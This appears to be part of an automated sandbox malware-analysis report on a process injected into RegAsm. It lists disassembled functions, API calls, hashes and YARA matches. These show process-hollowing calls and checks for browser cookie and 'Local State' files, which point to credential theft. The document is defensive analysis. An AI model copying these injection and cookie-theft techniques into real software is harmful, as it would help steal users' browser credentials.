                                                                                                                            Similarity
                                                                                                                            • API ID: EventObjectSingleWaitsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3963590051-0
                                                                                                                            • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                                                                            • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                                                                            • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                                                                            • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual$HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519776433-0
                                                                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                            • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                                                                            • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                                                                            • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                                                                            • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                                                                            • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                            • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                                                                            • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                                                                            • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                                                                            • RegQueryValueExA.KERNEL32 ref: 00413587
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                            • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                                                                            • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                                            • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                                                                                            • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00413535
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                            • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                                                                            • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                                            • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                            • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                                                                            • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1818849710-0
                                                                                                                            • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                            • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                                                                            • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                                            • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                                                                              • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                                                                              • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                                                                              • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                                                                              • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                                                                              • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                                                                              • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                                                                              • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                                                                              • Part of subcall function 004180EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                                                                              • Part of subcall function 004180EF: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                                                                            • CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                                                                            • CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                            • String ID: t^F
                                                                                                                            • API String ID: 2948481953-389975521
                                                                                                                            • Opcode ID: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                                                                            • Instruction ID: f5f9b7b4b8a2ed15acd0e1e17f357bf619fd4f1f7ce3194d250e30b15390ff54
                                                                                                                            • Opcode Fuzzy Hash: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                                                                            • Instruction Fuzzy Hash: E7D05E75C4120CFFCB006BA4EC0A8AEBB7CFB09201B4001AAFC2442253AB329818CA64
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                                            • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                            • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                                                                            • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                                                                            • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1807457897-3916222277
                                                                                                                            • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                                                                            • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                                                                                            • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                                                                            • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen
                                                                                                                            • String ID: pQG
                                                                                                                            • API String ID: 176396367-3769108836
                                                                                                                            • Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                                                                            • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                                                                            • Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                                                                            • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String
                                                                                                                            • String ID: LCMapStringEx
                                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                                            • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                            • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                                                                            • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                                                                            • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                                                                            APIs
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String
                                                                                                                            • String ID: LCMapStringEx
                                                                                                                            • API String ID: 2568140703-3893581201
                                                                                                                            • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                                                                            • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                                                                            • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                                                                            • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C818
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: User Data\Local State
                                                                                                                            • API String ID: 1174141254-3604364636
                                                                                                                            • Opcode ID: b32e60095c5f4f90c22fdc2caae491d154b89188abc484f728fa2f552e62e18e
                                                                                                                            • Instruction ID: 4ba9aac63b26862b1c8efdd1d0126766dc1997cc7edc34995d26a8b23f1540e3
                                                                                                                            • Opcode Fuzzy Hash: b32e60095c5f4f90c22fdc2caae491d154b89188abc484f728fa2f552e62e18e
                                                                                                                            • Instruction Fuzzy Hash: 62F0303191021AD6CB04FBA5DC96CEE7778AE1470AB00017BBA06B61E2FF789905C6D9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C589: PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C7B5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: Network\Cookies
                                                                                                                            • API String ID: 1174141254-3524344919
                                                                                                                            • Opcode ID: 70741f696857b694876d2501b7d99e16c4dc69534d77b9792097640468f76e3b
                                                                                                                            • Instruction ID: 00bed2b57767f5c2bb1af07a2f575242ec68e4de0a62838bcb8be90dfc143fe8
                                                                                                                            • Opcode Fuzzy Hash: 70741f696857b694876d2501b7d99e16c4dc69534d77b9792097640468f76e3b
                                                                                                                            • Instruction Fuzzy Hash: 53F01D3191021AD6CB04FBA5DC968EEB778AD14709B00017BBA06B21D2EF78990986D9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C87B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: User Data\Local State
                                                                                                                            • API String ID: 1174141254-3604364636
                                                                                                                            • Opcode ID: 8107cc5d7e0bc79f1a918125c26029d9c2c6c95de1e7409e74dfad3f24fe7a38
                                                                                                                            • Instruction ID: 2cea31e15f179ef26c72c71e3a8c92f4f78f9a0b2bed1d8044b560421d8a7800
                                                                                                                            • Opcode Fuzzy Hash: 8107cc5d7e0bc79f1a918125c26029d9c2c6c95de1e7409e74dfad3f24fe7a38
                                                                                                                            • Instruction Fuzzy Hash: 00F0303191021AE6CB04FBA5DC46CEE7778AD1470AB00017BBA06B61D2EF789905C6DD
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040C589: PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0040C8DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExistsFilePath
                                                                                                                            • String ID: Local State
                                                                                                                            • API String ID: 1174141254-22827320
                                                                                                                            • Opcode ID: 33c2bed666acfcef7d331ed4809c64e82c8937b5a8c1f3690ee01fcae1c4ec0b
                                                                                                                            • Instruction ID: 5906eb44b52407a1e69b826cf05916b84adb9a124773a2bd44f496935e1fc446
                                                                                                                            • Opcode Fuzzy Hash: 33c2bed666acfcef7d331ed4809c64e82c8937b5a8c1f3690ee01fcae1c4ec0b
                                                                                                                            • Instruction Fuzzy Hash: 8FF03031A1021AD6CB04F7A5DC46CEE7778AD1470AB00017BBA02B21D6EF78990AC6D9
                                                                                                                            APIs
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                                                                                            Strings
                                                                                                                            • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                            • String ID: InitializeCriticalSectionEx
                                                                                                                            • API String ID: 2593887523-3084827643
                                                                                                                            • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                                                                            • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                                                                                            • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                                                                            • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Alloc
                                                                                                                            • String ID: FlsAlloc
                                                                                                                            • API String ID: 2773662609-671089009
                                                                                                                            • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                            • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                            • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                                                                            • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Alloc
                                                                                                                            • String ID: FlsAlloc
                                                                                                                            • API String ID: 2773662609-671089009
                                                                                                                            • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                                                                            • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                                                                                            • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                                                                            • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                                                                                            APIs
                                                                                                                            • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: try_get_function
                                                                                                                            • String ID: FlsAlloc
